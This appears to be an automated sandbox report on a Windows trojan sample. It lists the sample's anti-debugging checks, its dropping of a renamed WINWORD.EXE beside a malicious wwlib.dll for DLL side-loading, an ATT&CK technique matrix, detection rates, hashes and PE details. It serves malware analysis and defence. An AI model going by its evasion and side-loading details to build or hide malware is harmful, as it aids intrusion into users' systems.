2_2_6D861351

Source: C:\Windows\Help\Windows\LibHelper.exe TID: 4660	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\Help\Windows\WINWORD.EXE TID: 5560	Thread sleep count: 111 > 30	Jump to behavior
Source: C:\Windows\Help\Windows\WINWORD.EXE TID: 5560	Thread sleep time: -111000s >= -30000s	Jump to behavior

Source: C:\Windows\Help\Windows\WINWORD.EXE	Last function: Thread delayed
Source: C:\Windows\Help\Windows\WINWORD.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0083A383 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0083A383
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0084B014 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0084B014
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0085A02E FindFirstFileExA,	0_2_0085A02E
Source: C:\Windows\Help\Windows\LibHelper.exe	Code function: 1_2_01075746 FindFirstFileExW,	1_2_01075746
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_6D868875 FindFirstFileExW,	2_2_6D868875
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03039CCD FindFirstFileExW,	2_2_03039CCD

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Code function: 0_2_0084D3A8 VirtualQuery,GetSystemInfo,

0_2_0084D3A8

Source: C:\Windows\Help\Windows\WINWORD.EXE

Code function: 2_2_03062842 rdtsc

2_2_03062842

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Code function: 0_2_0084E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0084E4F5

Source: C:\Windows\Help\Windows\WINWORD.EXE

Code function: 2_2_2FF116C4 GetLastError,OutputDebugStringA,

2_2_2FF116C4

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00856B19 mov eax, dword ptr fs:[00000030h]	0_2_00856B19
Source: C:\Windows\Help\Windows\LibHelper.exe	Code function: 1_2_01075478 mov eax, dword ptr fs:[00000030h]	1_2_01075478
Source: C:\Windows\Help\Windows\LibHelper.exe	Code function: 1_2_01073CED mov eax, dword ptr fs:[00000030h]	1_2_01073CED
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_6D868442 mov eax, dword ptr fs:[00000030h]	2_2_6D868442
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_6D866F25 mov eax, dword ptr fs:[00000030h]	2_2_6D866F25
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03051188 mov eax, dword ptr fs:[00000030h]	2_2_03051188
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03069722 mov eax, dword ptr fs:[00000030h]	2_2_03069722
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03035F74 mov eax, dword ptr fs:[00000030h]	2_2_03035F74
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03067E15 mov eax, dword ptr fs:[00000030h]	2_2_03067E15
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_030696DE mov eax, dword ptr fs:[00000030h]	2_2_030696DE
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03052D21 mov eax, dword ptr fs:[00000030h]	2_2_03052D21
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_0303946E mov eax, dword ptr fs:[00000030h]	2_2_0303946E

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Code function: 0_2_0085ACFC GetProcessHeap,

0_2_0085ACFC

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0084E643 SetUnhandledExceptionFilter,	0_2_0084E643
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0084E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0084E4F5
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0084E7FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0084E7FC
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00857C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00857C57
Source: C:\Windows\Help\Windows\LibHelper.exe	Code function: 1_2_01071C8F SetUnhandledExceptionFilter,	1_2_01071C8F
Source: C:\Windows\Help\Windows\LibHelper.exe	Code function: 1_2_010719D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_010719D8
Source: C:\Windows\Help\Windows\LibHelper.exe	Code function: 1_2_010736EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_010736EF
Source: C:\Windows\Help\Windows\LibHelper.exe	Code function: 1_2_01071AF9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_01071AF9
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_2FF11B2C IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	2_2_2FF11B2C
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_6D86497A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6D86497A
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_6D8667F2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6D8667F2
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_6D864A9B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6D864A9B
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03032289 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_03032289
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_0303760D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0303760D
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03032CAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_03032CAF

HIPS / PFW / Operating System Protection Evasion:

Injects files into Windows application

Show sources

Source: C:\Windows\Help\Windows\WINWORD.EXE

Injected file: C:\Windows\Help\Windows\wwlib.dll was created by C:\Users\user\Desktop\9nZ3r5ZN45.exe

Jump to behavior

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Process created: C:\Windows\Help\Windows\LibHelper.exe 'C:\Windows\Help\Windows\LibHelper.exe'			Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Process created: C:\Windows\Help\Windows\WINWORD.EXE 'C:\Windows\Help\Windows\WINWORD.EXE'			Jump to behavior

Source: C:\Windows\Help\Windows\WINWORD.EXE

Code function: 2_2_6D8611F0 GetCurrentThread,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateFileMappingA,MapViewOfFile,CreateThread,GetLastError,FindCloseChangeNotification,UnmapViewOfFile,

2_2_6D8611F0

Source: LibHelper.exe, 00000001.00000002.462552264.0000000001430000.00000002.00000001.sdmp, WINWORD.EXE, 00000002.00000002.462301547.0000000001940000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: LibHelper.exe, 00000001.00000002.462552264.0000000001430000.00000002.00000001.sdmp, WINWORD.EXE, 00000002.00000002.462301547.0000000001940000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: LibHelper.exe, 00000001.00000002.462552264.0000000001430000.00000002.00000001.sdmp, WINWORD.EXE, 00000002.00000002.462301547.0000000001940000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: LibHelper.exe, 00000001.00000002.462552264.0000000001430000.00000002.00000001.sdmp, WINWORD.EXE, 00000002.00000002.462301547.0000000001940000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Code function: 0_2_0084E34B cpuid

0_2_0084E34B

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00849E0C

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Code function: 0_2_0084CC0E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,

0_2_0084CC0E

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Code function: 0_2_0083AA39 GetVersionExW,

0_2_0083AA39

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	Windows Service2	Windows Service2	Masquerading12	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Service Execution1	DLL Side-Loading1	Process Injection112	Virtualization/Sandbox Evasion2	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Logon Script (Windows)	DLL Side-Loading1	Process Injection112	Security Account Manager	Security Software Discovery26	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Virtualization/Sandbox Evasion2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Process Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing2	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	System Information Discovery24	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
9nZ3r5ZN45.exe	50%	Virustotal		Browse
9nZ3r5ZN45.exe	25%	ReversingLabs	Win32.Trojan.Bingoml

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Help\Windows\wwlib.dll	100%	Avira	TR/Crypt.XPACK.Gen2
C:\Windows\Help\Windows\LibHelper.exe	17%	ReversingLabs	Win32.Trojan.Generic
C:\Windows\Help\Windows\WINWORD.EXE	0%	Metadefender		Browse
C:\Windows\Help\Windows\WINWORD.EXE	0%	ReversingLabs
C:\Windows\Help\Windows\wwlib.dll	17%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.WINWORD.EXE.6d860000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen2		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://%s%08x.txtc:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://%s%08x.txtc:	WINWORD.EXE, 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	377823
Start date:	30.03.2021
Start time:	01:16:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	9nZ3r5ZN45 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.evad.winEXE@5/3@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 42.8% (good quality ratio 40.4%) Quality average: 79.5% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 52% Number of executed functions: 129 Number of non-executed functions: 175
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:16:57	API Interceptor	26x Sleep call for process: LibHelper.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Windows\Help\Windows\LibHelper.exe Download File
Process:	C:\Users\user\Desktop\9nZ3r5ZN45.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	173568
Entropy (8bit):	5.389453047477484
Encrypted:	false
SSDEEP:	3072:l9WNnc6HMMIZgj8/DRuFusgHIscPSmUCoxn:l9Wx2gquFuDxn
MD5:	813B19969C3B67C6BB1369433142021A
SHA1:	68227261421DD1707BDD0DBCCA0C62B89BD09D03
SHA-256:	3B15BC7DD4DD8379A9A8E19DF06C67F3E08FCC694CC5BA95D45E50BFD3412EF1
SHA-512:	73C101C29B63B87C99CE4BFB1A9B9F3DD0C89C68AB5371BD796468254EF87E0FC68823CE15952CE4CFADEF4608A7223DC50FB46521BD659481DFC1835982E6E4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................b..........W.......W.......W.................~......~.......b....~......Rich...........PE..L...O.a`..........................................@.......................................@..................................%..<....P...u......................t.......................................@...............p............................text.............................. ..`.rdata...].......^..................@..@.data........0......................@....rsrc....u...P...v... ..............@..@.reloc..t...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\Help\Windows\WINWORD.EXE Download File
Process:	C:\Users\user\Desktop\9nZ3r5ZN45.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1422168
Entropy (8bit):	5.910237374197159
Encrypted:	false
SSDEEP:	24576:wLZmQR3caJZLZmvNzc0TDZodoSRsfHMbvmQakU:8ZmQyaJ1ZmFcqi+SRAG+J
MD5:	15E52F52ED2B8ED122FAE897119687C4
SHA1:	6E35AE1D5B6F192109D7A752ACD939F5CA2B97A6
SHA-256:	8CFB55087FA8E4C1E7BCC580D767CF2C884C1B8C890AD240C1E7009810AF6736
SHA-512:	338C12AF5AF509C19932619007AB058E0E97B65FE32609F14D29F6CC7818814DBDBB8613F81146A10A78197B3F6FBC435FAB9FE1537D1EB83C30B9F4487B6AEA
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........JI.N+'_N+'_N+'_Py._M+'_GS._L+'_GS._M+'_GS._]+'_i.\_M+'_N+&_.+'_GS._M+'_GS._O+'_GS._O+'_GS._O+'_RichN+'_........................PE..L....%.K.....................\|...............@.....0.................................^....@..........................%......\&..<....@..ts..............X............+..8...............................@............................................text...(........................... ..`.data........0......."..............@....rsrc...ts...@...t...$..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Help\Windows\wwlib.dll Download File
Process:	C:\Users\user\Desktop\9nZ3r5ZN45.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	400384
Entropy (8bit):	6.570599153043862
Encrypted:	false
SSDEEP:	12288:LRduZPxM5Ik3xkjZnj9jgZH0HVNPfFNN:L+tZhxL
MD5:	B3A134E15E3F33DE0B2B1F189C240DD1
SHA1:	9C0CA0A8869C2DACB448EF7294EB1C30846E1F44
SHA-256:	5666C5BB0EFCF74D962E25F75EE73F37F9C02C9C1D5F7761F3804458185252B0
SHA-512:	58AD874FE33D4A347C119FD4609B01B64A3A9DC1743F84DAAC3C5EAE6D6D83DF13591988883FDB09DBF2C62D38018EF8EFFBECC84AC166CE1C1AA2C7EBA8D437
Malicious:	true
Yara Hits:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: C:\Windows\Help\Windows\wwlib.dll, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J..+...+...+...C...+...C..9+...C...+...Z...+...Z...+...y^..+...Z...+...C...+...+...+..)Y...+..)Y@..+...+(..+..)Y...+..Rich.+..................PE..L...8.a`...........!.........>......TI....................................................@.................................DY..<....P.......................`.......N.......................O.......N..@...............h............................text...J........................... ..`.rdata..ja.......b..................@..@.data........p.......L..............@....detourc..... ......................@..@.detourd.....@......................@....rsrc........P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.781320186803254
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	9nZ3r5ZN45.exe
File size:	980255
MD5:	910fe72c4f1bd5a451561f732d94a8b8
SHA1:	a93ebdd16c5862b178d6e5c58d3e074df772a021
SHA256:	6beb4a5bcbdaf33f697eea6a4f7f2e9704cc88c20c265d0ce42287d930d06345
SHA512:	e5369b02851b437a7ed68607ff806acaf2c5d517cbd2fc4e3798f95b497d84858650f728d3b68861cb3ecd4012bdc2fb8dd4a0285d4e4dcbd25f10947813ea47
SSDEEP:	24576:KNcBtkaXI+ASdfCsNHHbMz9r4gcIsl2PBSCKu6P:NZ68fL+R1sIX+P
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	d49494d6c88ecec2

Static PE Info

General
Entrypoint:	0x41e239
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5DE8B3B3 [Thu Dec 5 07:37:23 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007FC918A700AFh
jmp 00007FC918A6FAE3h
cmp ecx, dword ptr [0043D668h]
jne 00007FC918A6FC55h
ret
jmp 00007FC918A70226h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00433068h
mov dword ptr [ecx], 00434284h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC918A6304Ah
mov dword ptr [esi], 00434290h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00434298h
mov dword ptr [ecx], 00434290h
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FC918A6FBFCh
push 0043A4D8h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FC918A724E4h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FC918A6FC12h
push 0043A70Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FC918A724C7h
int3
jmp 00007FC918A74525h
jmp dword ptr [00432260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421480h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[EXP] VS2015 UPD3.1 build 24215
[LNK] VS2015 UPD3.1 build 24215
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3b610	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b644	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0xd474	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x70000	0x212c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x397d0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x34218	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x32000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3abb4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3060f	0x30800	False	0.587940963273	data	6.69301762007	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x32000	0xa402	0xa600	False	0.450465926205	data	5.20298013153	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x238b0	0x1200	False	0.368272569444	data	3.83802003955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids	0x61000	0xe8	0x200	False	0.333984375	data	2.11816950811	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x62000	0xd474	0xd600	False	0.663441880841	data	6.85483760276	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x70000	0x212c	0x2200	False	0.790441176471	data	6.6217922841	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
PNG	0x62644	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	Chinese	China
PNG	0x6318c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	Chinese	China
RT_ICON	0x64738	0x568	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x64ca0	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0	Chinese	China
RT_ICON	0x65548	0xea8	data	Chinese	China
RT_ICON	0x663f0	0x468	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x66858	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0	Chinese	China
RT_ICON	0x67900	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0	Chinese	China
RT_ICON	0x69ea8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Chinese	China
RT_DIALOG	0x6dc1c	0x18e	data	Chinese	China
RT_DIALOG	0x6ddac	0xee	data	Chinese	China
RT_DIALOG	0x6de9c	0xd2	data	Chinese	China
RT_DIALOG	0x6df70	0x112	data	Chinese	China
RT_DIALOG	0x6e084	0x2a2	data	Chinese	China
RT_DIALOG	0x6e328	0x1e6	data	Chinese	China
RT_STRING	0x6e510	0xb6	data	Chinese	China
RT_STRING	0x6e5c8	0xd6	data	Chinese	China
RT_STRING	0x6e6a0	0xbc	data	Chinese	China
RT_STRING	0x6e75c	0x74	data	Chinese	China
RT_STRING	0x6e7d0	0x282	data	Chinese	China
RT_STRING	0x6ea54	0x94	data	Chinese	China
RT_STRING	0x6eae8	0x88	data	Chinese	China
RT_STRING	0x6eb70	0x7c	data	Chinese	China
RT_STRING	0x6ebec	0x52	data	Chinese	China
RT_STRING	0x6ec40	0x78	data	Chinese	China
RT_GROUP_ICON	0x6ecb8	0x68	data	Chinese	China
RT_MANIFEST	0x6ed20	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	Chinese	China

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, 